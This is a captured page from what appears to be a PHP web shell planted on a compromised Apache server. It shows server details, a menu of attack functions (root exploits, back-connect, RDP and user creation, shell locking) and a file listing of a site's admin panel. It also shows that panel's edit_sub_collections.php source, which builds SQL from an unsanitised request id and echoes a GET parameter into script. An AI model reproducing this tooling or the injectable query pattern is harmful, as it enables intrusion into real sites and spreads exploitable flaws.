Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax
[ DIR ]
drwxr-xr-x
app-assets
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
module
[ DIR ]
drwxr-xr-x
PhpXlsxGenerator.php
54.22
KB
-rw-r--r--
ad_contact_details.php
14.65
KB
-rw-r--r--
add_360_category.php
4.56
KB
-rw-r--r--
add_360_products.php
7.11
KB
-rw-r--r--
add_application.php
5.06
KB
-rw-r--r--
add_blogs.php
8.72
KB
-rw-r--r--
add_brands.php
6.56
KB
-rw-r--r--
add_catalogues.php
7.02
KB
-rw-r--r--
add_collections.php
12.59
KB
-rw-r--r--
add_division.php
8.29
KB
-rw-r--r--
add_effects.php
4.95
KB
-rw-r--r--
add_events.php
10.41
KB
-rw-r--r--
add_gallery.php
8.79
KB
-rw-r--r--
add_main_event.php
8.63
KB
-rw-r--r--
add_multiple_products.php
10.54
KB
-rw-r--r--
add_products.php
28.81
KB
-rw-r--r--
add_series.php
7.45
KB
-rw-r--r--
add_thickness.php
6.63
KB
-rw-r--r--
all_360_category.php
9.63
KB
-rw-r--r--
all_360_products.php
7.63
KB
-rw-r--r--
all_application.php
10.43
KB
-rw-r--r--
all_blogs.php
10.91
KB
-rw-r--r--
all_brands.php
7.07
KB
-rw-r--r--
all_catalogues.php
10.05
KB
-rw-r--r--
all_collections.php
7.01
KB
-rw-r--r--
all_division.php
7.38
KB
-rw-r--r--
all_effects.php
10.26
KB
-rw-r--r--
all_events.php
10.29
KB
-rw-r--r--
all_gallery.php
10.48
KB
-rw-r--r--
all_main_events.php
10
KB
-rw-r--r--
all_products.php
18.18
KB
-rw-r--r--
all_products_new.php
13.4
KB
-rw-r--r--
all_series.php
10.23
KB
-rw-r--r--
all_sub_collections.php
7.4
KB
-rw-r--r--
all_sub_division.php
7.76
KB
-rw-r--r--
all_thickness.php
7.64
KB
-rw-r--r--
divisions.php
486
B
-rw-r--r--
edit_360_category.php
5.04
KB
-rw-r--r--
edit_360_products.php
7.9
KB
-rw-r--r--
edit_application.php
5.88
KB
-rw-r--r--
edit_blogs.php
9.46
KB
-rw-r--r--
edit_brands.php
7.4
KB
-rw-r--r--
edit_catalogue.php
7.95
KB
-rw-r--r--
edit_collections.php
16.95
KB
-rw-r--r--
edit_gallery.php
8.85
KB
-rw-r--r--
edit_main_events.php
9.79
KB
-rw-r--r--
edit_product.php
35.18
KB
-rw-r--r--
edit_series.php
8.98
KB
-rw-r--r--
edit_sub_collections.php
17.26
KB
-rw-r--r--
edit_sub_event.php
10.73
KB
-rw-r--r--
edit_thickness.php
7.58
KB
-rw-r--r--
export_excel.php
4.21
KB
-rw-r--r--
functions.php
523
B
-rw-r--r--
index.php
3.77
KB
-rw-r--r--
login.php
6.83
KB
-rw-r--r--
logout.php
92
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_sub_collections.php
<?php include("include/header.php"); $res_fre = "SELECT * FROM `tbl_collection` WHERE `collection_id` = '".$_REQUEST['id']."'"; $data_fre = mysqli_query($conn,$res_fre); $fetch_row = mysqli_fetch_assoc($data_fre); ?> <div class="main-panel"> <!-- BEGIN : Main Content--> <div class="main-content"> <div class="content-wrapper"><div class="row"> <div class="col-sm-12"> <div class="content-header">Collection Management</div> </div> </div> <!-- Input Validation start --> <section class="input-validation"> <form name="myform" action="#" method="POST" onsubmit="return false;"> <?php if($_SERVER['QUERY_STRING'] == "success") { echo '<div class="alert alert-primary mb-2" role="alert"><strong> Success!</strong> Collection has been edited.</div>'; } if($_SERVER['QUERY_STRING'] == "err") { echo '<div class="alert alert-warning mb-2" role="alert"><strong> Warning!</strong> Please check details. </div>'; } ?> <div class="row"> <div class="col-md-6"> <div class="card"> <div class="card-header"> <h4 class="card-title" id="basic-layout-form">Add Collection</h4> </div> <div class="card-content"> <div class="px-3"> <div class="form-body"> <br> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label for="collection_name">Sub Collection Name</label> <input type="text" class="form-control" name="collection_name" id="collection_name" value="<?= $fetch_row['collection_name']; ?>"> </div> </div> <div class="col-md-6"> <div class="form-group"> <label for="collection_slug">Sub Collection Slug Name</label> <input type="text" class="form-control" name="collection_slug" id="collection_slug" value="<?= $fetch_row['collection_slug']; ?>"> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="collection_parent">Select Collection parent</label> <select name="collection_parent" id="collection_parent" class="form-control"> <option value="0">-- Select --</option> <?php function categoryTree($parent_id = 0, $sub_mark = ''){ global $conn; $query = $conn->query("SELECT * FROM tbl_collection WHERE parent_id = $parent_id ORDER BY collection_name ASC"); if($query->num_rows > 0){ while($row = $query->fetch_assoc()){ echo '<option value="'.$row['collection_id'].'">'.$sub_mark.$row['collection_name'].'</option>'; categoryTree($row['collection_id'], $sub_mark.'--'); } } } categoryTree(); ?> </select> </div> </div> </div> <h4 class="form-section"><i class="ft-file-text"></i>For Collection page title, description, and image</h4> <div class="form-group"> <label for="collection_meta">Collection Title</label> <input type="text" class="form-control" name="collection_meta" id="collection_meta" value="<?= $fetch_row['collection_meta']; ?>"> </div> <div class="form-group"> <label for="collection_meta_desc">Collection Descriptions</label> <textarea rows="5" class="form-control" name="collection_meta_desc" id="collection_meta_desc"><?= $fetch_row['collection_meta_desc']; ?></textarea> </div> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label>Collection Image</label> <input type="file" class="form-control-file" name="collection_image" id="collection_image"> <?php if (isset($fetch_row["collection_image"]) && $fetch_row["collection_image"]!="") { ?> <img height="50" width="50" src="../uploads/collections/<?= $fetch_row["collection_image"];?>"> <?php } else { ?> <td><img src="uploads/noimage.png" width="50px" height="50px"></td> <?php } ?> </div> </div> <div class="col-md-6"> <div class="form-group"> <label>Collection Logo</label> <input type="file" class="form-control-file" name="collection_logo" id="collection_logo"> <?php if (isset($fetch_row["collection_logo"]) && $fetch_row["collection_logo"]!="") { ?> <img height="50" width="50" src="../uploads/collections_logo/<?= $fetch_row["collection_logo"];?>"> <?php } else { ?> <td><img src="uploads/noimage.png" width="50px" height="50px"></td> <?php } ?> </div> </div> </div> <h4 class="form-section"><i class="ft-file-text"></i>For Size Image & Content, and Thickness Image</h4> <div class="row"> <div class="col-md-6"> <div class="form-group"> <label>Collection Size Image</label> <input type="file" class="form-control-file" name="collection_size_image" id="collection_size_image"> <?php if (isset($fetch_row["collection_size_image"]) && $fetch_row["collection_size_image"]!="") { ?> <img height="50" width="50" src="../uploads/size_thickness/<?= $fetch_row["collection_size_image"];?>"> <?php } else { ?> <td><img src="uploads/noimage.png" width="50px" height="50px"></td> <?php } ?> </div> </div> <div class="col-md-6"> <div class="form-group"> <label>Collection Thickness</label> <input type="file" class="form-control-file" name="collection_thickness" id="collection_thickness"> <?php if (isset($fetch_row["collection_thickness"]) && $fetch_row["collection_thickness"]!="") { ?> <img height="50" width="50" src="../uploads/size_thickness/<?= $fetch_row["collection_thickness"];?>"> <?php } else { ?> <td><img src="uploads/noimage.png" width="50px" height="50px"></td> <?php } ?> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="collection_size_title">Collection Size Title</label> <input type="text" class="form-control" name="collection_size_title" id="collection_size_title" value="<?= $fetch_row["collection_size_title"];?>" /> </div> <div class="form-group"> <label for="collection_size_desc">Collection Size Desciption</label> <textarea rows="5" class="form-control" name="collection_size_desc" id="collection_size_desc"><?= $fetch_row["collection_size_desc"];?></textarea> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-6"> <div class="card"> <div class="card-content"> <div class="px-3"> <div class="form-body"> <br> <h4 class="form-section"><i class="ft-file-text"></i>For Size & Finish page title, description, and image</h4> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="page_title">Page Title </label> <input type="text" class="form-control" name="page_title" id="page_title" value="<?= $fetch_row["page_title"];?>" autocomplete="off"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="page_description">Page Descriptions </label> <textarea id="page_description" rows="5" class="form-control" name="page_description"><?= $fetch_row["page_description"];?> </textarea> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label>Page Image </label> <input type="file" class="form-control-file" name="page_image" id="page_image"> <?php if (isset($fetch_row["page_image"]) && $fetch_row["page_image"]!="") { ?> <img height="50" width="50" src="../uploads/collections/<?= $fetch_row["page_image"];?>"> <?php } else { ?> <td><img src="uploads/noimage.png" width="50px" height="50px"></td> <?php } ?> </div> </div> </div> <h4 class="form-section"><i class="ft-file-text"></i>For Finish page Section, description, and image</h4> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">Section Title</label> <input type="text" class="form-control" name="section_title" id="section_title" value="<?= $fetch_row["section_title"];?>" autocomplete="off"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_description">Section Descriptions</label> <textarea id="section_description" rows="5" class="form-control" name="section_description"><?= $fetch_row["section_description"];?></textarea> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label>Section Image</label> <input type="file" class="form-control-file" name="section_image" id="section_image"> <?php if (isset($fetch_row["section_image"]) && $fetch_row["section_image"]!="") { ?> <img height="50" width="50" src="../uploads/collections/<?= $fetch_row["section_image"];?>"> <?php } else { ?> <td><img src="uploads/noimage.png" width="50px" height="50px"></td> <?php } ?> </div> </div> </div> <div class="form-group"> <label>Visibility</label> <div class="input-group"> <div class="custom-control custom-radio custom-control-inline"> <input type="radio" id="show" name="visibility" class="custom-control-input" value="1" checked> <label class="custom-control-label" for="show">Show</label> </div> <div class="custom-control custom-radio custom-control-inline"> <input type="radio" id="hide" name="visibility" class="custom-control-input" value="0"> <label class="custom-control-label" for="hide">Hide</label> </div> </div> </div> <div class="form-actions"> <button type="button" id="add_collection" class="btn btn-raised btn-raised btn-primary"> <i class="fa fa-check-square-o"></i> Save </button> <button type="button" class="btn btn-raised btn-raised btn-warning mr-1"> <i class="ft-x"></i> Cancel </button> </div> </div> </div> </div> </div> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js"></script> <script> $("#collection_parent").val('<?= $fetch_row['parent_id'];?>').trigger("change"); $("#add_collection").click(function(){ var err_txt = 0; if(err_txt==0) { $("#overLay").show(); var m_data = new FormData(); m_data.append( 'collection_name', $('input[name=collection_name]').val()); m_data.append( 'collection_slug', $('input[name=collection_slug]').val()); m_data.append( 'collection_parent', $( "#collection_parent option:selected" ).val()); m_data.append( 'collection_meta', $('input[name=collection_meta]').val()); m_data.append( 'collection_meta_desc', $('textarea[name=collection_meta_desc]').val()); m_data.append( 'visibility', $('input[name=visibility]').val()); m_data.append( 'collection_image', $('input[name=collection_image]')[0].files[0]); m_data.append( 'collection_logo', $('input[name=collection_logo]')[0].files[0]); m_data.append( 'page_title', $('input[name=page_title]').val()); m_data.append( 'page_description', $('textarea[name=page_description]').val()); m_data.append( 'page_image', $('input[name=page_image]')[0].files[0]); m_data.append( 'collection_size_image', $('input[name=collection_size_image]')[0].files[0]); m_data.append( 'collection_thickness', $('input[name=collection_thickness]')[0].files[0]); m_data.append( 'collection_size_desc', $('textarea[name=collection_size_desc]').val()); m_data.append( 'section_title', $('input[name=section_title]').val()); m_data.append( 'section_description', $('textarea[name=section_description]').val()); m_data.append( 'section_image', $('input[name=section_image]')[0].files[0]); m_data.append( 'edit_collection_id', '<?= $_GET["id"];?>'); $.ajax({ url: 'ajax/aj_edit_collection.php', type:'POST', data: m_data, processData: false, contentType: false, success: function(res) { $("#spnmsg").html(res); $("#overLay").hide(); if(res == "success") { location.href = "all_sub_collections.php?success"; } if(res == "err") { location.href = "all_sub_collections.php?err"; } } }); } }); </script> </form> </div> </section> <!-- Input Validation end --> </div> </div> <!-- END : End Main Content--> <?php include("include/footer.php"); ?> <script type="text/javascript"> $( document ).ready(function() { $('#collection_name').keyup(function() { var oneValue = $("[name='collection_name']").val().replace(/ /g,'-'); $('#collection_slug').val(oneValue); }); }); </script>
Close